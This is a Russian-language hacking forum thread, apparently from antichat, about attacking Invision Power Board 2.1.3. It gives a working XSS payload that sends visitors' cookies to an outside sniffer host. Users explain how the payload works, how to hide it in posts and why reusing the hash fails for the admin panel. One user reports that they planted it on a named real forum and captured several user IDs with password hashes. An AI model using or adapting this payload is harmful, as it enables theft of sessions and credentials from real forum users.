Вопрос про уязвимости в IPB v2.1.3

Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!

 

HTML:

[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Ploho ishesh

 

Спасибо попробую

 

А как от этого защитится ?

 

ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?

 

Потому что в 2.х в админке еще раз проверяеться пасс...
тебе надо пасс админа а не кго куки.
а так как это 2.х ты не разшифруеш мд5 без соли...
разшифровывай и заходи в админку

 

Вроде выключить bb код

 

narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa

 

` - это символ обратного апострофа, он является ограничителем атрибутов, но только в IE.

 

Эти адреса не важны вообще: можешь поставить вместо их что-угодно.

 

там в админке можно включать привязку сессии к ипу и браузеру. по умолчанию привязка только к ипу, насколько я помню.

 

Вот например мне нужно поместить этот код на форум:
http://forum.la2world.ru/index.php?showtopic=3208&st=40

Что должно быть написано в коде?

Замест wj@wj, мой е-майл, а замест етого:
http://www.wj.com`=`].com
что должно быть?

 

Эээ...да тебе вообще ничего не надо заменять )))) тебе просто код Джордана надо фтыкнуть и все а далее смотри на логе сниффера, который указал, в коде Джордана это - http://antichat.ru/sniff/log.php и ищи свои данные (только сначала удостоверься, пашет ли вообще код )

 

Здесь еще одна проблема...
Когда ставлю етот код, то в IE все норм, тоесть в сообщении ничего не отображается, НО в Opera отображается такое:
.com'>[email protected] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Можно ли ето как-нить убрать?

 

З.Ы. Код нормально пашет ))

 

тока в осле работает!

 

Если бы он работал, тогда бы это не писалось, значит маскируй цветом или размерами....

 

ОК, попробую, но код пашет, т.к. в ИЕ не отображается и на снифер пришло уже 3 ИД с хешами....
Еще вопрос... Можно-ли как-то добавить в пост с кодом, что-бы пост был не пустой, а там что-то отображалось? Я пробовал записять в начало, не получилось....

 

Ну дак просто вставляешь скрипт, например:
[script] а потом текст!
и все - идет типо скрипт и текст, скрипт не видно а текст видно, мол ты просто запостил и все

 

=) Щас попробуем...